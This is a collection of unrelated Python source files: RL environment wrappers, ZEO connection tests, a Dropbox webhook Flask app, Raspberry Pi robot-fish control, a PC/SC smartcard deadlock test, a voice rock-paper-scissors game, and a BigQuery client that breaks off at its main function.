ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env._reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(object):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
self.num_envs = len(env_fns)
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
zipped_args = zip(self.work_remotes, self.remotes, env_fns)
self.ps = [
Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zipped_args
]
for p in self.ps:
# if the main process crashes, we should not cause things to hang
p.daemon = True
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.observation_space = observation_space
self.action_space = action_space
def _step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def _step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def _reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
def step(self, actions):
self._step_async(actions)
return self._step_wait()
class Monitor(gym.Wrapper):
def __init__(self, env, info_keywords=None):
super(Monitor, self).__init__(env)
self._monitor_rewards = None
self._info_keywords = info_keywords or []
def reset(self, **kwargs):
self._monitor_rewards = []
return self.env.reset(**kwargs)
def step(self, action):
o_, r, done, info = self.env.step(action)
self._monitor_rewards.append(r)
if done:
info['episode'] = {
'r': sum(self._monitor_rewards),
'l': len(self._monitor_rewards)
}
for keyword in self._info_keywords:
info['episode'][keyword] = info[keyword]
return o_, r, done, info
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
|
testConnection.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Test setup for ZEO connection logic.
The actual tests are in ConnectionTests.py; this file provides the
platform-dependent scaffolding.
"""
from __future__ import with_statement, print_function
from ZEO.tests import ConnectionTests, InvalidationTests
from zope.testing import setupstack
import os
if os.environ.get('USE_ZOPE_TESTING_DOCTEST'):
from zope.testing import doctest
else:
import doctest
import unittest
import ZODB.tests.util
import ZEO
from . import forker
class FileStorageConfig(object):
def getConfig(self, path, create, read_only):
return """\
<filestorage 1>
path %s
create %s
read-only %s
</filestorage>""" % (path,
create and 'yes' or 'no',
read_only and 'yes' or 'no')
class MappingStorageConfig(object):
def getConfig(self, path, create, read_only):
return """<mappingstorage 1/>"""
class FileStorageConnectionTests(
FileStorageConfig,
ConnectionTests.ConnectionTests,
InvalidationTests.InvalidationTests
):
"""FileStorage-specific connection tests."""
class FileStorageReconnectionTests(
FileStorageConfig,
ConnectionTests.ReconnectionTests,
):
"""FileStorage-specific re-connection tests."""
# Run this at level 1 because MappingStorage can't do reconnection tests
class FileStorageInvqTests(
FileStorageConfig,
ConnectionTests.InvqTests
):
"""FileStorage-specific invalidation queue tests."""
class FileStorageTimeoutTests(
FileStorageConfig,
ConnectionTests.TimeoutTests
):
pass
class MappingStorageConnectionTests(
MappingStorageConfig,
ConnectionTests.ConnectionTests
):
"""Mapping storage connection tests."""
# The ReconnectionTests can't work with MappingStorage because it's only an
# in-memory storage and has no persistent state.
class MappingStorageTimeoutTests(
MappingStorageConfig,
ConnectionTests.TimeoutTests
):
pass
class SSLConnectionTests(
MappingStorageConfig,
ConnectionTests.SSLConnectionTests,
):
pass
test_classes = [FileStorageConnectionTests,
FileStorageReconnectionTests,
FileStorageInvqTests,
FileStorageTimeoutTests,
MappingStorageConnectionTests,
MappingStorageTimeoutTests,
]
if not forker.ZEO4_SERVER:
test_classes.append(SSLConnectionTests)
def invalidations_while_connecting():
r"""
As soon as a client registers with a server, it will recieve
invalidations from the server. The client must be careful to queue
these invalidations until it is ready to deal with them. At the time
of the writing of this test, clients weren't careful enough about
queing invalidations. This led to cache corruption in the form of
both low-level file corruption as well as out-of-date records marked
as current.
This tests tries to provoke this bug by:
- starting a server
>>> addr, _ = start_server()
- opening a client to the server that writes some objects, filling
it's cache at the same time,
>>> import ZEO, ZODB.tests.MinPO, transaction
>>> db = ZEO.DB(addr, client='x')
>>> conn = db.open()
>>> nobs = 1000
>>> for i in range(nobs):
... conn.root()[i] = ZODB.tests.MinPO.MinPO(0)
>>> transaction.commit()
>>> import zope.testing.loggingsupport, logging
>>> handler = zope.testing.loggingsupport.InstalledHandler(
... 'ZEO', level=logging.INFO)
# >>> logging.getLogger('ZEO').debug(
# ... 'Initial tid %r' % conn.root()._p_serial)
- disconnecting the first client (closing it with a persistent cache),
>>> db.close()
- starting a second client that writes objects more or less
constantly,
>>> import random, threading, time
>>> stop = False
>>> db2 = ZEO.DB(addr)
>>> tm = transaction.TransactionManager()
>>> conn2 = db2.open(transaction_manager=tm)
>>> random = random.Random(0)
>>> lock = threading.Lock()
>>> def run():
... while 1:
... i = random.randint(0, nobs-1)
... if stop:
... return
... with lock:
... conn2.root()[i].value += 1
... tm.commit()
... #logging.getLogger('ZEO').debug(
... # 'COMMIT %s %s %r' % (
... # i, conn2.root()[i].value, conn2.root()[i]._p_serial))
... time.sleep(0)
>>> thread = threading.Thread(target=run)
>>> thread.setDaemon(True)
>>> thread.start()
- restarting the first client, and
- testing for cache validity.
>>> bad = False
>>> try:
... for c in range(10):
... time.sleep(.1)
... db = ZODB.DB(ZEO.ClientStorage.ClientStorage(addr, client='x'))
... with lock:
... #logging.getLogger('ZEO').debug('Locked %s' % c)
... @wait_until("connected and we have caught up", timeout=199)
... def _():
... if (db.storage.is_connected()
... and db.storage.lastTransaction()
... == db.storage._call('lastTransaction')
... ):
... #logging.getLogger('ZEO').debug(
... # 'Connected %r' % db.storage.lastTransaction())
... return True
...
... conn = db.open()
... for i in range(1000):
... if conn.root()[i].value != conn2.root()[i].value:
... print('bad', c, i, conn.root()[i].value, end=" ")
... print(conn2.root()[i].value)
... bad = True
... print('client debug log with lock held')
... while handler.records:
... record = handler.records.pop(0)
... print(record.name, record.levelname, end=' ')
... print(handler.format(record))
... #if bad:
... # with open('server.log') as f:
... # print(f.read())
... #else:
... # logging.getLogger('ZEO').debug('GOOD %s' % c)
... db.close()
... finally:
... stop = True
... thread.join(10)
>>> thread.isAlive()
False
>>> for record in handler.records:
... if record.levelno < logging.ERROR:
... continue
... print(record.name, record.levelname)
... print(handler.format(record))
>>> handler.uninstall()
>>> db.close()
>>> db2.close()
"""
def test_suite():
suite = unittest.TestSuite()
for klass in test_classes:
sub = unittest.makeSuite(klass, 'check')
sub.layer = ZODB.tests.util.MininalTestLayer(
klass.__name__ + ' ZEO Connection Tests')
suite.addTest(sub)
sub = doctest.DocTestSuite(
setUp=forker.setUp, tearDown=setupstack.tearDown,
)
sub.layer = ZODB.tests.util.MininalTestLayer('ZEO Connection DocTests')
suite.addTest(sub)
return suite
|
app.py
|
# Adapted from https://github.com/dropbox/mdwebhook
from hashlib import sha256
import hmac
import json
import os
import threading
from urllib.parse import urlparse
from dropbox.client import DropboxClient, DropboxOAuth2Flow
from flask import abort, Flask, redirect, render_template, request, session, url_for
# App key and secret from the App console (dropbox.com/developers/apps)
#APP_KEY = os.environ['APP_KEY']
#APP_SECRET = os.environ['APP_SECRET']
app = Flask(__name__)
app.config.from_pyfile('default_config.py')
if os.path.isfile('app_config.py'):
app.config.from_pyfile('app_config.py')
app.debug = True
def get_url(route):
'''Generate a proper URL, forcing HTTPS if not running locally'''
host = urlparse(request.url).hostname
url = url_for(
route,
_external=True,
_scheme='http' if host in ('127.0.0.1', 'localhost') else 'https'
)
return url
def get_flow():
return DropboxOAuth2Flow(
app.config['APP_KEY'],
app.config['APP_SECRET'],
get_url('oauth_callback'),
session,
'dropbox-csrf-token')
@app.route('/oauth_callback')
def oauth_callback():
'''Callback function for when the user returns from OAuth.'''
access_token, uid, extras = get_flow().finish(request.args)
# Extract and store the access token for this user
redis_client.hset('tokens', uid, access_token)
process_user(uid)
return redirect(url_for('done'))
cursors = {}
files = set()
def process_prefix(prefix, verbose=True):
'''Call /delta for the given user ID and process any changes.'''
global cursors
global files
# OAuth token for the user
token = app.config['DROPBOX_APP_TOKEN']
# /delta cursor for the user (None the first time)
# cursor = redis_client.hget('cursors', uid)
cursor = cursors.get(prefix)
client = DropboxClient(token)
has_more = True
while has_more:
result = client.delta(cursor, path_prefix=prefix)
for path, metadata in result['entries']:
if verbose:
if metadata is None:
print("DELETED", path)
if path in files:
files.remove(path)
elif path in files:
print('MODIFIED', path, metadata.get('modifier'))
else:
print('ADDED', path, metadata.get('modifier'))
files.add(path)
# Update cursor
cursor = result['cursor']
cursors[prefix] = cursor
# Repeat only if there's more to do
has_more = result['has_more']
def process_all(verbose=True):
'''Call /delta for the given user ID and process any changes.'''
print("CHANGES!")
for prefix in app.config['DROPBOX_PATH_PREFIXES']:
process_prefix(prefix, verbose=verbose)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/login')
def login():
return redirect(get_flow().start())
@app.route('/done')
def done():
return render_template('done.html')
def validate_request():
'''Validate that the request is properly signed by Dropbox.
(If not, this is a spoofed webhook.)'''
signature = request.headers.get('X-Dropbox-Signature')
return signature == hmac.new(app.config['DROPBOX_APP_SECRET'], request.data, sha256).hexdigest()
@app.route('/webhook', methods=['GET'])
def challenge():
'''Respond to the webhook challenge (GET request) by echoing back the challenge parameter.'''
return request.args.get('challenge')
@app.route('/webhook', methods=['POST'])
def webhook():
'''Receive a list of changed user IDs from Dropbox and process each.'''
print("INCOMING")
# Make sure this is a valid request from Dropbox
if not validate_request(): abort(403)
#for uid in json.loads(request.data)['delta']['users']:
# We need to respond quickly to the webhook request, so we do the
# actual work in a separate thread. For more robustness, it's a
# good idea to add the work to a reliable queue and process the queue
# in a worker process.
threading.Thread(target=process_all).start()
return ''
if __name__=='__main__':
process_all(verbose=False)
app.run(debug=True, host='0.0.0.0', port=12345)
#threading.Thread(target=process_user, args=(uid,)).start()
|
exp_circle_cb.py
|
from lib_fin_simple_c import *
from time import sleep
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
import numpy as np
from lib_camera import Camera
import threading
from lib_leds import LEDS
from lib_depthsensor import DepthSensor
from lib_fin import Fin
from lib_photodiode import Photodiode
depth_sensor = DepthSensor()
depth_sensor.update()
surface_pressure = depth_sensor.pressure_mbar
leds = LEDS()
photodiode = Photodiode()
caudal = CaudalFin()
caudal.off()
pecl = PecLFin()
pecl.off()
pecr = PecRFin()
pecr.off()
dorsal = DorsalFin()
dorsal.off()
cam_l = Camera('left')
cam_r = Camera('right')
cam_l.colorbot_settings()
cam_r.colorbot_settings()
mask_l = np.loadtxt("/home/pi/fishfood/mask_l.txt", dtype=np.int32)
mask_r = np.loadtxt("/home/pi/fishfood/mask_r.txt", dtype=np.int32)
mask_cb = np.loadtxt("/home/pi/fishfood/mask_cb.txt", dtype=np.int32)
img_dark = 255*np.ones((192, 256))
sensor_value = 0
pecl_state = 0
pecr_state = 0
dorsal_state = 0
dive = 0
caudal.off()
dorsal.off()
pecl.down()
pecr.down()
sleep(1)
pecl.off()
pecr.off()
caudal.off()
dorsal.off()
def update_sensor_local():
global sensor_value
cam_l.capture()
cam_r.capture()
L = cam_l.img
R = cam_r.img
LM = np.multiply(img_dark-L[:, :, 2], mask_cb)
RM = np.multiply(img_dark-R[:, :, 2], mask_cb)
LA = np.multiply(LM, mask_l)
RA = np.multiply(RM, mask_r)
sensor_value = (np.sum(LA) > 30) or (np.sum(RA) > 30) #fb check 30 threshold
def update_sensor():
x = threading.Thread(target=update_sensor_local)
x.start()
def rotate_left(T_caudal, N_pectoral, N_dorsal, t_caudal, t_cam):
global pecl_state
global pecr_state
global dorsal_state
global dive
caudal.left()
pecl.off()
if (dive == 1):
if (dorsal_state == 0):
dorsal.left()
else:
dorsal.right()
# Ensure pectoral fin is in right position so first flip generates thrust
if (pecr_state == 0):
pecr.down()
else:
pecr.up()
# --------------------------------------------------------
# GENERATE TIMINGS AND EVENTS SEQUENCE
#---------------------------------------------------------
t_pectoral = np.linspace(0, T_caudal, N_pectoral + 1)
t_pectoral = np.delete(t_pectoral, 0)
t_dorsal = np.linspace(0, T_caudal, N_dorsal + 1)
t_dorsal = np.delete(t_dorsal, 0)
t = np.array([0])
t = np.append(t, t_pectoral)
t = np.append(t, t_dorsal)
t = np.append(t, t_caudal)
t = np.append(t, t_cam)
waits = np.diff(np.sort(t))
events = 1*np.ones(N_pectoral)
events = np.append(events, 2*np.ones(N_dorsal))
events = np.append(events, [3])
events = np.append(events, [4])
# SORT EVENTS
t_events = np.delete(t, 0)
inds = t_events.argsort()
events = events[inds]
events = events.astype(int)
#----------------------------------------------------------
for i in range(np.size(waits)):
sleep(waits[i])
if (events[i] == 1):
if (pecr_state == 0):
pecr.up()
else:
pecr.down()
pecr_state = 1 - pecr_state
if (events[i] == 2 and dive == 1):
if (dorsal_state == 0):
dorsal.right()
else:
dorsal.left()
dorsal_state = 1 - dorsal_state
if (events[i] == 3):
caudal.right()
if (events[i] == 4):
update_sensor()
def rotate_right(T_caudal, N_pectoral, N_dorsal, t_caudal, t_cam):
global pecl_state
global pecr_state
global dorsal_state
global dive
caudal.right()
pecr.off()
if (dive == 1):
if (dorsal_state == 0):
dorsal.right()
else:
dorsal.left()
# Ensure pectoral fin is in right position so first flip generates thrust
if (pecl_state == 0):
pecl.down()
else:
pecl.up()
# --------------------------------------------------------
# GENERATE TIMINGS AND EVENTS SEQUENCE
#---------------------------------------------------------
t_pectoral = np.linspace(0, T_caudal, N_pectoral + 1)
t_pectoral = np.delete(t_pectoral, 0)
t_dorsal = np.linspace(0, T_caudal, N_dorsal + 1)
t_dorsal = np.delete(t_dorsal, 0)
t = np.array([0])
t = np.append(t, t_pectoral)
t = np.append(t, t_dorsal)
t = np.append(t, t_caudal)
t = np.append(t, t_cam)
waits = np.diff(np.sort(t))
events = 1*np.ones(N_pectoral)
events = np.append(events, 2*np.ones(N_dorsal))
events = np.append(events, [3])
events = np.append(events, [4])
# SORT EVENTS
t_events = np.delete(t, 0)
inds = t_events.argsort()
events = events[inds]
events = events.astype(int)
#----------------------------------------------------------
for i in range(np.size(waits)):
sleep(waits[i])
if (events[i] == 1):
if (pecl_state == 0):
pecl.up()
else:
pecl.down()
pecl_state = 1 - pecl_state
if (events[i] == 2 and dive == 1):
if (dorsal_state == 0):
dorsal.left()
else:
dorsal.right()
dorsal_state = 1 - dorsal_state
if (events[i] == 3):
caudal.left()
if (events[i] == 4):
update_sensor()
def idle():
"""Waiting for starting signal
"""
thresh_photodiode = 50 # lights off: 2, lights on: 400 -> better range!
while photodiode.brightness > thresh_photodiode:
photodiode.update()
leds.on()
sleep(1)
leds.off()
sleep(2)
leds.on()
sleep(1)
leds.off()
sleep(2)
idle()
'''
depth_mm = 0
pecl.off()
pecr.off()
caudal.off()
while (depth_mm < 600):
dorsal.left()
sleep(0.1)
dorsal.right()
sleep(0.1)
depth_sensor.update()
depth_mm = max(0, (depth_sensor.pressure_mbar - surface_pressure) * 10.197162129779)
dorsal.off()
'''
#for i in range(240):
for i in range(round(240*0.4/0.3)):
if (sensor_value == True):
#rotate_left(0.4, 5, 3, 0.25, 0.3)
rotate_left(0.25, 5, 3, 0.15, 0.3)
else:
#rotate_right(0.4, 5, 3, 0.25, 0.3)
rotate_right(0.25, 5, 3, 0.15, 0.3)
GPIO.cleanup()
|
SCardBeginTransaction_deadlock.py
|
#! /usr/bin/env python
# SCardBeginTransaction_deadlock.py: Unitary test for locking in
# SCardBeginTransaction, SCardTransmit, SCardStatus and SCardReconnect
# Copyright (C) 2012 Ludovic Rousseau
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, see <http://www.gnu.org/licenses/>.
# [Muscle] [PATCH] fix deadlock in PCSC-Lite
# http://archives.neohapsis.com/archives/dev/muscle/2012-q2/0109.html
# fixed in revisions 6358, 6359, 6360 and 6361
from smartcard.scard import *
from smartcard.pcsc.PCSCExceptions import *
import threading
import time
def myThread(reader):
print "thread 2: SCardConnect"
hresult, hcard2, dwActiveProtocol = SCardConnect(hcontext1, reader, SCARD_SHARE_SHARED, SCARD_PROTOCOL_ANY)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
# wait for the 1st thread to begin a transaction
time.sleep(1)
"""
# check for SCardBeginTransaction
print "thread 2: SCardBeginTransaction"
hresult = SCardBeginTransaction(hcard2)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 2: SCardEndTransaction"
hresult = SCardEndTransaction(hcard2, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
"""
"""
# check for SCardTransmit()
SELECT = [0x00, 0xA4, 0x00, 0x00, 0x02, 0x3F, 0x00]
print "thread 2: SCardTransmit"
hresult, response = SCardTransmit(hcard2, dwActiveProtocol, SELECT)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print response
"""
"""
# check for SCardStatus()
print "thread 2: SCardStatus"
hresult, reader, state, protocol, atr = SCardStatus(hcard2)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
"""
# check for SCardReconnect()
print "thread 2: SCardReconnect"
hresult, dwActiveProtocol = SCardReconnect(hcard2,
SCARD_SHARE_SHARED, SCARD_PROTOCOL_ANY, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 2: SCardDisconnect"
hresult = SCardDisconnect(hcard2, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 1: SCardEstablishContext"
hresult, hcontext1 = SCardEstablishContext(SCARD_SCOPE_USER)
if hresult != SCARD_S_SUCCESS:
raise EstablishContextException(hresult)
print "thread 1: SCardListReaders"
hresult, readers = SCardListReaders(hcontext1, [])
if hresult != SCARD_S_SUCCESS:
raise ListReadersException(hresult)
print 'PC/SC Readers:', readers
reader = readers[0]
print "Using reader:", reader
# second thread
t = threading.Thread(target=myThread, args=(reader, ))
t.start()
# wait for the 1st thread to begin a transaction
time.sleep(0.5)
print "thread 1: SCardConnect"
hresult, hcard1, dwActiveProtocol = SCardConnect(hcontext1, reader, SCARD_SHARE_SHARED, SCARD_PROTOCOL_ANY)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 1: SCardBeginTransaction"
hresult = SCardBeginTransaction(hcard1)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
time.sleep(2)
print "thread 1: SCardEndTransaction"
hresult = SCardEndTransaction(hcard1, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
# give time to thread2 to finish
time.sleep(1)
print "thread 1: SCardDisconnect"
hresult = SCardDisconnect(hcard1, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 1: SCardReleaseContext"
hresult = SCardReleaseContext(hcontext1)
if hresult != SCARD_S_SUCCESS:
raise ReleaseContextException(hresult)
|
game.py
|
from random import *
import playsound
from tkinter import *
from PIL import Image, ImageTk
from threading import Thread
import speech_recognition as sr
import pyttsx3
import time
from pynput.keyboard import Key, Controller
def closeWindow():
keyboard = Controller()
keyboard.press(Key.alt_l)
keyboard.press(Key.f4)
keyboard.release(Key.f4)
keyboard.release(Key.alt_l)
try:
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id) #male
engine.setProperty('volume', 1)
except Exception as e:
print(e)
def speak(text):
print(text)
engine.say(text)
engine.runAndWait()
def record():
global userchat
userchat['text'] = "Listening..."
r = sr.Recognizer()
r.dynamic_energy_threshold = False
r.energy_threshold = 4000
with sr.Microphone() as source:
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
said = ""
try:
said = r.recognize_google(audio)
print(f"\nUser said: {said}")
except Exception as e:
print(e)
speak("I think it is invalid move...")
return "None"
return said.lower()
moves = ['rock', 'paper', 'scissor']
class RockPaperScissor:
def __init__(self):
self.playerScore = 0
self.botScore = 0
self.total_moves = 0
self.intro()
def intro(self):
speak("Welcome to the Rock Paper Scissor Game. To STOP the Match, say STOP or Cancel. Let's Play.")
def nextMove(self, move):
global userchat, botchat, totalLabel, botMoveLBL
userchat['text'] = move.upper()
botMove = randint(0,2)
playerMove = moves.index(move)
botchat['text'] = moves[botMove].upper()
self.total_moves += 1
if botMove==playerMove:
self.botScore += 1
self.playerScore += 1
elif botMove==0:
if playerMove==1:
self.playerScore += 1
else:
self.botScore += 1
elif botMove==1:
if playerMove==2:
self.playerScore += 1
else:
self.botScore += 1
else:
if playerMove==0:
self.playerScore += 1
else:
self.botScore += 1
totalLabel['text'] = str(self.botScore)+' | '+str(self.playerScore)
if botMove==0: botMoveLBL['image'] = rockImg
if botMove==1: botMoveLBL['image'] = paperImg
if botMove==2: botMoveLBL['image'] = scissorImg
speak('I choose: ' + str(moves[botMove]))
return botMove+1
def whoWon(self):
result = ""
if self.playerScore == self.botScore:
result = "The match is draw !\n"
elif self.playerScore > self.botScore:
result = "You won the match Sir! Well Done !\n"
else:
result = "You lose the match Sir! Haha!\n"
for el in root.winfo_children():
el.destroy()
if 'won' in result:
Label(root, image=winImg).pack(pady=30)
elif 'lose' in result:
Label(root, image=loseImg).pack(pady=30)
else:
Label(root, image=drawImg).pack(pady=30)
result += "You have won " +str(self.playerScore)+"/"+str(self.total_moves)+" matches."
Label(root, text='Score', font=('Arial Bold', 50), fg='#FE8A28', bg='white').pack()
Label(root, text=str(self.playerScore)+' / '+str(self.total_moves), font=('Arial Bold', 40), fg='#292D3E', bg='white').pack()
speak(result)
time.sleep(1)
closeWindow()
return
rockImg, paperImg, scissorImg, userchat, botchat, totalLabel, botMoveLBL, userMoveLBL, winImg, loseImg, drawImg = None, None, None, None, None, None, None, None, None, None, None
def playRock():
rp = RockPaperScissor()
while True:
global botMoveLBL, userMoveLBL
move = record()
if isContain(move, ["don't", "cancel", "stop"]):
rp.whoWon()
break
else:
img = None
if 'rock' in move:
userMoveLBL['image'] = rockImg
img = rp.nextMove('rock')
elif 'paper' in move:
userMoveLBL['image'] = paperImg
img = rp.nextMove('paper')
elif 'scissor' in move or 'caesar' in move:
userMoveLBL['image'] = scissorImg
img = rp.nextMove('scissor')
def rockPaperScissorWindow():
global root, rockImg, paperImg, scissorImg, userchat, botchat, totalLabel, botMoveLBL, userMoveLBL, winImg, loseImg, drawImg
root = Tk()
root.title('Rock Paper Scissor')
# root.resizable(0,0)
# root.attributes('-toolwindow', True)
w_width, w_height = 400, 650
s_width, s_height = root.winfo_screenwidth(), root.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
root.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30)) #center location of the screen
root.configure(bg='white')
rockImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/1.jpg'))
paperImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/2.jpg'))
scissorImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/3.jpg'))
grayImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/grayQuestion.png'))
orangeImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/orangeQuestion.jpg'))
winImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/win.jpg'))
loseImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/lose.jpg'))
drawImg = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/draw.jpg'))
toplbl = Label(root, text='Total Score', font=('Arial Bold', 20), fg='#FE8A28', bg='white').pack()
totalLabel = Label(root, text='0 | 0', font=('Arial Bold', 15), fg='#1F1F1F', bg='white')
totalLabel.pack()
#bottom image
img = ImageTk.PhotoImage(Image.open('extrafiles/ROCKPAPERSCISSOR/rockPaperScissor.jpg'))
downLbl = Label(root, image=img)
downLbl.pack(side=BOTTOM)
#user response
userchat = Label(root, text='Listening...', bg='#FE8A28', fg='white', font=('Arial Bold',13))
userchat.place(x=300, y=120)
userMoveLBL = Label(root, image=orangeImg)
userMoveLBL.place(x=260, y=150)
#bot response
botchat = Label(root, text='Waiting...', bg='#EAEAEA', fg='#494949', font=('Arial Bold',13))
botchat.place(x=12, y=120)
botMoveLBL = Label(root, image=grayImg)
botMoveLBL.place(x=12, y=150)
Thread(target=playRock).start()
root.iconbitmap("extrafiles/images/game.ico")
root.mainloop()
def isContain(text, lst):
for word in lst:
if word in text:
return True
return False
def play(gameName):
speak('')
if isContain(gameName, ['dice','die']):
playsound.playsound('extrafiles/audios/dice.mp3')
result = "You got " + str(randint(1,6))
return result
elif isContain(gameName, ['coin']):
playsound.playsound('extrafiles/audios/coin.mp3')
p = randint(-10,10)
if p>0: return "You got Head"
else: return "You got Tail"
elif isContain(gameName, ['rock','paper','scissor','first']):
rockPaperScissorWindow()
return
else:
print("Game Not Available")
def showGames():
return "1. Rock Paper Scissor\n2. Online Games"
|
bq_client.py
|
import argparse
import sys
import logging
from utils.bigquery_utils import BigQueryUtils
from utils.common_utils import *
from gcputils.utils.bigquery_utils import *
from gcputils.utils.common_utils import *
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
class BigQueryClient:
def __init__(self, args):
"""
:param args: argparse Namespace instance which contains list of command line args
"""
self.bq_utils = BigQueryUtils(project=args.project)
self.template_fields = self.read_from_file(args.template_file) if args.template_file else args.template
self.start_date = args.start_date if args.start_date else datetime.now()
self.end_date = args.end_date if args.end_date else self.start_date
self.date_diff = self.end_date - self.start_date
if args.service_account_path:
self.service = self.bq_utils.get_connection(service_account_file_path=args.service_account_path)
else:
self.service = self.bq_utils.get_connection()
def read_from_file(self, file_path):
"""
:param file_path: full absolute path of the file that need to be read
:return: return string content of the file
"""
return open(file_path).read()
def controller(self, args):
"""
:param args: Namespace object which contains list of arguments
:return:
"""
start_date = self.start_date
end_date = self.end_date
dataset_id = None
table_id = None
while end_date >= start_date: # backfilling
logging.info("Executing query for {}".format(datetime.strftime(start_date, "%Y-%d-%m")))
if args.query or args.query_file:
query_string = apply_template_values(args.query if args.query else self.read_from_file(args.query_file), execution_date=start_date)
if args.destination_table and not args.dml:
try:
assert len(args.destination_table.split(':')) <= 1
assert len(args.destination_table.split('.')) == 2
except Exception as e:
raise argparse.ArgumentError("destination table is not in proper format <datasetid>.<tableid>")
dataset_id, table_id = args.destination_table.split('.')
table_id = apply_template_values(table_id, self.template_fields, execution_date=start_date)
logging.info("----------------------------")
logging.info("table name - %s", table_id)
logging.info("----------------------------")
try:
logging.info("bq job initiated for date - {}".format(datetime.strftime(start_date, "%Y-%m-%d")))
self.bq_utils.query_to_table(self.service,
query=query_string,
dest_dataset_id=dataset_id,
dest_table_id=table_id,
flattern_results=args.flattern_results,
write_disposition=args.write_desposition,
use_standard_sql=bool(args.ssql),
is_dml=bool(args.dml))
logging.info(
"Successfully completed for date - {}".format(datetime.strftime(start_date, "%Y-%m-%d ")))
except Exception as e:
logging.info("Something went wrong for date {}".format(datetime.strftime(start_date, "%Y-%m-%d")))
logging.info(e)
else:
logging.info("Please provide destination details")
start_date = start_date + timedelta(1)
def main():
